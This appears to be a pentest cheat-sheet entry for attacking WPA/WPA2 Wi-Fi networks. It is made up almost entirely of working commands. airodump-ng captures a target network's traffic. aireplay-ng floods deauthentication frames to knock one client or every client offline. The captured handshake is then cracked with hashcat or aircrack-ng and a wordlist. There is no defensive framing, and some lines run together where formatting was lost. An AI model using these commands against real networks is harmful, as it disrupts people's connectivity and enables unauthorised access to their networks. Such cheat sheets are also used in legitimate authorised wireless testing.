WPA/ WPA2
Deauth Attack:
# start listening and recording traffic
airodump-ng --bssid 30:46:9A:FC:53:C8 -c 2 -w wpa wlan0mon# deauth specific client traffic:
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 -h B8:2A:A9:56:95:C8 wlan0mon
# deauth all traffic:
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 wlan0monCrack:
# Hashcat
hcxpcapngtool -o wpa.hc22000 wpa-01.cap
hashcat -m 22000 wpa.hc22000 /usr/share/wordlist.txt
# Aircrack-ng
aircrack-ng wpa.hc22000 -w /usr/share/wordlist.txt
Last updated